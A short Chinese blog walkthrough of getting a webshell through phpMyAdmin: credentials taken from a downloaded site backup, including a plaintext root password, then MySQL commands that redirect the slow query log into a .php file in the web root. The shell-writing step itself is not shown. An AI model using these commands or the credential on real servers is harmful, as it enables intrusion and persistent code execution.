mysql写入php一句话
漏洞
目录浏览,phpinfo,
phpmyadmin 写shell
目标存在phpmyadmin,又因为目录浏览,看到网站备份的压缩文件,下载以后查找数据库用户密码,找到
root:fhcloud_2018 |
登录phpmyadmin,
getshell
想通过写入文件获得webshell,但是查询到导出路径为NULL,遂想通过日志来getshell
通过慢查询日志getshell,开启慢查询日志记录,通过phpinfo提供路径,进行log查询写入
show variables like '%slow_query_log%'; |

开启慢查询日志记录
set GLOBAL slow_query_log=on; |
通过phpinfo得知,web目录为C:\phpStudy\WWW\log.php,所以设置日志路径
set GLOBAL slow_query_log_file='C:\\phpStudy\\WWW\\log2.php'; |
基于日志写shell #
( outfile被禁止,或者写入文件被拦截,没写权限 ,有root权限)
show variables like '%general%'; --查看配置,日志是否开启,和mysql默认log地址(记下原地址方便恢复) |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Hao DevSecOps!
评论



